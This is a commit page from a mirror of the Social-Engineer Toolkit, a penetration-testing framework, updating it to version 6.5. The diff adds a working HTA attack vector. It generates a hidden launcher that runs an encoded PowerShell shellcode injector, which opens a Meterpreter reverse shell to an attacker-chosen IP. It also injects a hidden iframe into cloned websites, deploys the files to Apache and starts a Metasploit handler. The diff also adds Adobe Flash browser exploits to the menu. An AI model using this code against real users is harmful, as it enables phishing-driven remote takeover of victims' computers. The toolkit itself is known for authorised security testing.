Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-27 15:00:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update to version 6.5 of SET

Browse source
This commit is contained in:
TrustedSec 2015-07-23 13:31:14 -04:00
parent e851db7af6
commit f65ad2dab5
8 changed files with 189 additions and 91 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
readme/CHANGES
View file

@ -1,3 +1,15 @@
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~

89
src/core/dictionaries.py
View file

@ -24,49 +24,52 @@ def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1':"exploit/windows/browser/ms14_012_textrange",
'2':"exploit/windows/browser/ms14_012_cmarkup_uaf",
'3':"exploit/windows/browser/ms13_080_cdisplaypointer",
'4':"exploit/windows/browser/ie_setmousecapture_uaf",
'5':"exploit/multi/browser/java_jre17_jmxbean_2",
'6':"exploit/multi/browser/java_jre17_jmxbean",
'7':"exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'8':"exploit/windows/browser/ie_cbutton_uaf",
'9':"exploit/multi/browser/java_jre17_exec",
'10':"exploit/windows/browser/ie_execcommand_uaf",
'11':"exploit/multi/browser/java_atomicreferencearray",
'12':"exploit/multi/browser/java_verifier_field_access",
'13':"exploit/windows/browser/ms12_037_same_id",
'14':"exploit/windows/browser/msxml_get_definition_code_exec",
'15':"exploit/windows/browser/adobe_flash_rtmp",
'16':"exploit/windows/browser/adobe_flash_mp4_cprt",
'17':"exploit/windows/browser/ms12_004_midi",
'18':"multi/browser/java_rhino\nset target 1",
'19':"windows/browser/ms11_050_mshtml_cobjectelement",
'20':"windows/browser/adobe_flashplayer_flash10o",
'21':"windows/browser/cisco_anyconnect_exec",
'22':"windows/browser/ms11_003_ie_css_import",
'23':"windows/browser/wmi_admintools",
'24':"windows/browser/ms10_090_ie_css_clip",
'25':"windows/browser/java_codebase_trust",
'26':"windows/browser/java_docbase_bof",
'27':"windows/browser/webdav_dll_hijacker",
'28':"windows/browser/adobe_flashplayer_avm",
'29':"windows/browser/adobe_shockwave_rcsl_corruption",
'30':"windows/browser/adobe_cooltype_sing",
'31':"windows/browser/apple_quicktime_marshaled_punk",
'32':"windows/browser/ms10_042_helpctr_xss_cmd_exec",
'33':"windows/browser/ms10_018_ie_behaviors",
'34':"windows/browser/ms10_002_aurora",
'35':"windows/browser/ms10_018_ie_tabular_activex",
'36':"windows/browser/ms09_002_memory_corruption",
'37':"windows/browser/ms09_072_style_object",
'38':"windows/browser/ie_iscomponentinstalled",
'39':"windows/browser/ms08_078_xml_corruption",
'40':"windows/browser/ie_unsafe_scripting",
'41':"multi/browser/firefox_escape_retval",
'42':"windows/browser/mozilla_mchannel",
'43':"auxiliary/server/browser_autopwn",
'1':"exploit/multi/browser/adobe_flash_hacking_team_uaf",
'2':"exploit/multi/browser/adobe_flash_nellymoser_bof",
'3':"exploit/multi/browser/adobe_flash_shader_drawing_fill",
'4':"exploit/windows/browser/ms14_012_textrange",
'5':"exploit/windows/browser/ms14_012_cmarkup_uaf",
'6':"exploit/windows/browser/ms13_080_cdisplaypointer",
'7':"exploit/windows/browser/ie_setmousecapture_uaf",
'8':"exploit/multi/browser/java_jre17_jmxbean_2",
'9':"exploit/multi/browser/java_jre17_jmxbean",
'10':"exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'11':"exploit/windows/browser/ie_cbutton_uaf",
'12':"exploit/multi/browser/java_jre17_exec",
'13':"exploit/windows/browser/ie_execcommand_uaf",
'14':"exploit/multi/browser/java_atomicreferencearray",
'15':"exploit/multi/browser/java_verifier_field_access",
'16':"exploit/windows/browser/ms12_037_same_id",
'17':"exploit/windows/browser/msxml_get_definition_code_exec",
'18':"exploit/windows/browser/adobe_flash_rtmp",
'19':"exploit/windows/browser/adobe_flash_mp4_cprt",
'20':"exploit/windows/browser/ms12_004_midi",
'21':"multi/browser/java_rhino\nset target 1",
'22':"windows/browser/ms11_050_mshtml_cobjectelement",
'23':"windows/browser/adobe_flashplayer_flash10o",
'24':"windows/browser/cisco_anyconnect_exec",
'25':"windows/browser/ms11_003_ie_css_import",
'26':"windows/browser/wmi_admintools",
'27':"windows/browser/ms10_090_ie_css_clip",
'28':"windows/browser/java_codebase_trust",
'29':"windows/browser/java_docbase_bof",
'30':"windows/browser/webdav_dll_hijacker",
'31':"windows/browser/adobe_flashplayer_avm",
'32':"windows/browser/adobe_shockwave_rcsl_corruption",
'33':"windows/browser/adobe_cooltype_sing",
'34':"windows/browser/apple_quicktime_marshaled_punk",
'35':"windows/browser/ms10_042_helpctr_xss_cmd_exec",
'36':"windows/browser/ms10_018_ie_behaviors",
'37':"windows/browser/ms10_002_aurora",
'38':"windows/browser/ms10_018_ie_tabular_activex",
'39':"windows/browser/ms09_002_memory_corruption",
'40':"windows/browser/ms09_072_style_object",
'41':"windows/browser/ie_iscomponentinstalled",
'42':"windows/browser/ms08_078_xml_corruption",
'43':"windows/browser/ie_unsafe_scripting",
'44':"multi/browser/firefox_escape_retval",
'45':"windows/browser/mozilla_mchannel",
'46':"auxiliary/server/browser_autopwn",
}.get(exploit,"ERROR")

6
src/core/menu/text.py
View file

@ -62,6 +62,7 @@ webattack_menu = ['Java Applet Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'Full Screen Attack Method',
'HTA Attack Method',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
@ -119,6 +120,8 @@ The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The """ + bcolors.BOLD + """HTA Attack""" + bcolors.ENDC + """ method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
""")
webattack_vectors_menu = ['Web Templates',
@ -317,6 +320,9 @@ create_payloads_text = """
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',

102
src/core/set.py
View file

@ -162,6 +162,17 @@ try:
return_continue()
break
###############################################################
# HTA ATTACK VECTOR METHOD HERE
###############################################################
if attack_vector == '8':
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
# Removed to delete MLITM
if attack_vector != "99999":
@ -185,8 +196,9 @@ try:
try:
# write our attack vector to file to be called later
os.chdir(definepath)
filewrite = file(setdir + "/attack_vector","w")
#print definepath()
#os.chdir(definepath)
filewrite = file(setdir + "/attack_vector", "w")
# webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1":
@ -276,43 +288,45 @@ try:
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "webjacking":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = file(setdir + "/interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port FWD
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector != "hta":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = file(setdir + "/interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port FWD
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print_info("This option is used for what IP the server will POST to.")
print_info("If you're using an external IP, use your external IP for this")
ipaddr = raw_input(setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing"))
if check_options("IPADDR=") != 0: ipaddr = check_options("IPADDR=")
update_options("IPADDR=" + ipaddr)
# if java applet attack
@ -397,9 +411,10 @@ try:
if attack_vector != "webjacking":
if attack_vector != "multiattack":
if attack_vector != "profiler":
# spawn web server here
debug_msg(me, "importing 'src.html.spawn'", 1)
import src.html.spawn
if attack_vector != "hta":
# spawn web server here
debug_msg(me, "importing 'src.html.spawn'", 1)
import src.html.spawn
# multi attack vector here
@ -519,12 +534,13 @@ try:
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
sys.path.append("src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
if attack_vector != "hta":
sys.path.append("src/html")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
# Import your own site
if choice3 == '3':

8
src/core/setcore.py
View file

@ -233,7 +233,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.4.1'
define_version = '6.5'
return define_version
class create_menu:
@ -779,8 +779,8 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Tropic Thunder""" + bcolors.BLUE + """' [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Mr. Robot""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
@ -1261,8 +1261,6 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
shellcode = newdata[:-1]
except Exception, e: print_error("Something went wrong, printing error: " + str(e))
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
# powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$cmd = "-nop -noni -enc ";if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $x86 $cmd $e"}else{;iex "& powershell $cmd $e";}""" % (shellcode))
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % (shellcode))
# unicode and base64 encode and return it

0
src/webattack/hta/__init__.py Normal file
View file

46
src/webattack/hta/main.py Normal file
View file

@ -0,0 +1,46 @@
#!/usr/bin/python
######################################################
#
# Main files for the HTA attack vector within SET
#
######################################################
from src.core.setcore import *
def gen_hta_cool_stuff():
print_status("HTA Attack Vector selected. Enter your IP, Port, and Payload...")
ipaddr = raw_input("Enter the IP address for the reverse payload: ")
update_options("IPADDR=%s" % (ipaddr))
port = raw_input("Enter the port for the reverse payload [443]: ")
if port == "": port = "443"
print """Select the payload you want to deliver:\n\n 1. Meterpreter Reverse TCP\n 2. Meterpreter Reverse HTTP\n 3. Meterpreter Reverse HTTPS\n"""
selection = raw_input("Enter the payload number [1-3]: ")
# define the payloads
if selection == "": selection = "3"
if selection == "1": selection = "windows/meterpreter/reverse_tcp"
if selection == "2": selection = "windows/meterpreter/reverse_http"
if selection == "3": selection = "windows/meterpreter/reverse_https"
# generate powershell code
print_status("Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(selection, ipaddr, port, "x86")
command = "powershell -window hidden -enc " + ps
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
# metasploit answer file here
filewrite = file(setdir + "/meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close()
# write out main1 and main2
filewrite = file(setdir + "/hta_index", "w")
filewrite.write(main2)
filewrite.close()
# write out launcher.hta
filewrite = file(setdir + "/Launcher.hta", "w")
filewrite.write(main1)
filewrite.close()

17
src/webattack/web_clone/cloner.py
View file

@ -325,6 +325,23 @@ try:
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
## if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
# </body>
if os.path.isfile(setdir + "/Launcher.hta"):
data1 = file(setdir + "/web_clone/index.html", "r").read()
data2 = file(setdir + "/hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=")
shutil.copyfile(setdir + "/web_clone/index.html", apache_dir + "/index.html")
shutil.copyfile(setdir + "/Launcher.hta", apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("msfconsole -r %s/meta_config" % (setdir), shell=True).wait()
## selection of browser exploits
## check to see if multiattack is in use